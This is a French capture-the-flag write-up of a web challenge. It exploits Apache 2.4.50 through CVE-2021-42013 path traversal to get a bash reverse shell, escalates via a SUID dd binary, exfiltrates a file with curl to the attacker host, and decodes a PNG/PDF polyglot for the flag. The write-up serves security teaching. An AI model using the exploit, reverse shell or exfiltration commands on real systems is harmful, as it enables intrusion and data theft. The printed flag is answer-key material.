# Write up Web/Mithridates

## Consignes: 

```
Un ancien développeur travaillant pour l’ESD Academy a décidé de créer un nouveau site minimaliste avec le framework Hugo. 
Nous le soupçonnons d’avoir volé un projet avant d’avoir quitté l’entreprise, nous savons qu’il a exfiltré un document « pdf » contenant de précieuses informations.
Trouvez un moyen d’accéder au document et découvrez son contenu.
Le nom du fichier est flag.pdf et il est à la racine du dossier /root. 
Bonne chance !
```

## Pièce jointe :

```

```

## Serveur :

```
Docker
```

## Points attribués :

```
30
```

## Hint : 

```

```

## Flag :

```
ESD{F1LE_FORM@T_AreCo0L}
```

## Créateur :

```
ESD
```

## Description général du challenge :

```
Ce défi utilise la CVE-2021-42013 qui permet, dans certaines conditions, d’exécuter des commandes à distance.
Une fois connecté en reverse-shell sur le serveur en tant qu’utilisateur sans privilège, l’objectif est de récupérer le flag qui est un fichier « polyglotte » :
avec l’extension pdf vous aurez un véritable document et avec l’extension PNG vous obtiendrez un QR-CODE contenant le flag final.
```

## Connexion au challenge

```
http://<ip_game1>:3128
```

Découverte de  l’architecture et des versions utilisées.

```
curl -v -s -o /dev/null 127.0.0.1:3128 
```

```
*   Trying 127.0.0.1:3128...
* TCP_NODELAY set
* Connected to 127.0.0.1 (127.0.0.1) port 3128 (#0)
> GET / HTTP/1.1
> Host: 127.0.0.1:3128
> User-Agent: curl/7.68.0
> Accept: */*
> 
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< Date: Thu, 10 Mar 2022 17:04:01 GMT
< Server: Apache/2.4.50 (Unix)                     <=====     version de Apache
< Last-Modified: Mon, 31 Jan 2022 15:13:40 GMT
< ETag: "1c4e-5d6e23abd7100"
< Accept-Ranges: bytes
< Content-Length: 7246
< Content-Type: text/html
< 
{ [7246 bytes data]
* Connection #0 to host 127.0.0.1 left intact
```



Avec l’information que la version d’Apache est la 2.4.50, nous pouvons alors rechercher les CVE existantes.

![](images/cve-2021-42013.jpg)

Nous allons donc chercher à exploiter la **CVE-2021-42013** et a obtenir un revershell.
Sur la machine de l'attaquant, on lance un *netcat* avec port 1337 en écoute :

```
nc -nlvp 1337
```

Sur la machine de l'attaquant, on exécute la commande suivante

```
curl -s --path-as-is -d "echo Content-Type: text/plain; echo; bash -i >&/dev/tcp/<ip-joueur>/1337 0>&1" "http://<ip-challenge>:3128/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/bash"

```

On obtient un shell

```
daemon@de1cb6ed955b:/bin$ 
```

Parcours du dossier */home*

Intéressant, on découvre un fichier *flag.pdf* dont le propriétaire est **superuser**

```
/home/
  superuser
     r-- r----- superuser.root  flag.pdf
```

Détermination du compte système utilisé par apache 

```
id
uid=1(daemon) gid=1(daemon) groups=1(daemon)
```

Dans cette situation, je dois alors monter en privilège, pour cela des scripts comme « Linpeas » ou « LinEnum » peuvent être utilisés pour trouver des points d’entrées.
Dans notre cas il s’agit du binaire « dd » qui possède un bit SUID.

Exemple de commande utilisée pour lister les binaires suid :

```
find / -perm -4000 -type f -exec ls -la {} 2>/dev/null \;
```

```
-r-sr-xr-x 1 superuser root 76712 Feb 28  2019 /bin/dd      <==   dd est suid
-rwsr-xr-x 1 root root 51280 Jan 10  2019 /bin/mount
-rwsr-xr-x 1 root root 63568 Jan 10  2019 /bin/su
-rwsr-xr-x 1 root root 34888 Jan 10  2019 /bin/umount
-rwsr-xr-x 1 root root 54096 Jul 27  2018 /usr/bin/chfn
-rwsr-xr-x 1 root root 44528 Jul 27  2018 /usr/bin/chsh
-rwsr-xr-x 1 root root 84016 Jul 27  2018 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 44440 Jul 27  2018 /usr/bin/newgrp
-rwsr-xr-x 1 root root 63736 Jul 27  2018 /usr/bin/passwd
-rwsr-xr-x 1 root root 46384 Oct  5 22:26 /usr/local/apache2/bin/suexec
```

Pour savoir comment utiliser de manière détournée le binaire « dd », il existe un site : *Gtfobins*, qui explique comment faire :

Nous savons que le flag se trouve dans le home de l'utilisateur *superuser* et que c’est un document pdf.
on va copier le fichier *flag.pdf* avec *dd* et l'exporter sur la machine de l'attaquant.

Lecture du fichier *flag.pdf* et sauvegarde dans le dossier */tmp/test*

```
mkdir /tmp/test
chmod 777 /tmp/test

LFILE=/home/superuser/flag.pdf
dd if=$LFILE > /tmp/test/flag.pdf
```

Il faut maintenant transférer le fichier *flag.pdf* sur la machine de l'attaquant ou sur un site *online*

On choisit la solution du transfert sur la machine de l'attaquant.

On va utiliser le script python3 disponible sur github (https://gist.github.com/mildred/67d22d7289ae8f16cae7) 
Celui-ci doit être exécuté sur la machine de l' attaquant. Il simule le protocole *http* et accepte la methode *put*

```
./httpserver.py --bind 0.0.0.0 4444
Serving HTTP on 0.0.0.0 port 4444 (http://0.0.0.0:4444/) ...
<ip de l'attaquant> - - [10/Mar/2022 21:42:06] "PUT /flag.pdf HTTP/1.1" 201 -

```

Sur la machine de la victime, on exécute la commande suivante pour réaliser le transfert du fichier *flag.pdf*

```
curl <ip attaquant>:4444 -T /tmp/test/flag.pdf
```

```
curl 192.168.0.42:4444 -T /tmp/test/flag.pdf
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  140k    0     0  100  140k      0   139k  0:00:01  0:00:01 --:--:--  140k
```

Une fois le flag récupéré, si je l’ouvre au format « pdf » il affichera le contenu suivant, indiquant à l’utilisateur que le flag n’est pas dans le document.

![](images/pdf.jpg)

Néanmoins si j’ouvre le fichier avec un éditeur hexa, je peux constater qu’au début du fichier j’ai deux magics headers : 
un png et un pdf

```
Offset(h) 00 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F

00000000  89 50 4E 47 0D 0A 1A 0A 00 02 29 E3 63 4F 4D 4D  ‰PNG......)ãcOMM
00000010  25 50 44 46 2D 31 2E 37 0D 0A 25 B5 B5 B5 B5 0D  %PDF-1.7..%µµµµ.
00000020  0A 31 20 30 20 6F 62 6A 0D 0A 3C 3C 2F 54 79 70  .1 0 obj..<</Typ
00000030  65 2F 43 61 74 61 6C 6F 67 2F 50 61 67 65 73 20  e/Catalog/Pages 
00000040  32 20 30 20 52 2F 4C 61 6E 67 28 66 72 2D 46 52  2 0 R/Lang(fr-FR
00000050  29 20 2F 4D 65 74 61 64 61 74 61 20 32 34 20 30  ) /Metadata 24 0
00000060  20 52 2F 56 69 65 77 65 72 50 72 65 66 65 72 65   R/ViewerPrefere
00000070  6E 63 65 73 20 32 35 20 30 20 52 3E 3E 0D 0A 65  nces 25 0 R>>..e
```

Et à la fin du fichier j’ai également le chunck IEND qui apparait toujours en dernier dans un fichier au format PNG.

```
Offset(h) 00 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F

000231E0  65 B0 C0 02 0B 2C B0 1C C4 62 80 05 16 58 60 81  e°À..,°.Äb€..X`.
000231F0  05 16 03 2C B0 C0 02 0B 2C B0 18 60 81 05 16 58  ...,°À..,°.`...X
00023200  60 81 C5 00 0B 2C B0 C0 02 0B 2C 06 58 60 FD CA  `.Å..,°À..,.X`ýÊ
00023210  F8 07 D5 99 6A 39 8F A8 C5 03 00 00 00 00 49 45  ø.Õ™j9.¨Å.....IE
00023220  4E 44 AE 42 60 82                                ND®B`‚
```

Avec ces informations je peux déduire que le fichier est alors un polyglotte et qu’il est à la fois un PNG et un PDF.
Si je change cette fois ci l’extension du fichier en .png, j’obtiens une image lisible avec un simple QR Code que je peux décoder facilement sur un smartphone :

![](images/flag.png)



On obtient le flag est : ESD{F1LE_FORM@T_AreCo0L}

<!-- Ok F : 20220422 -->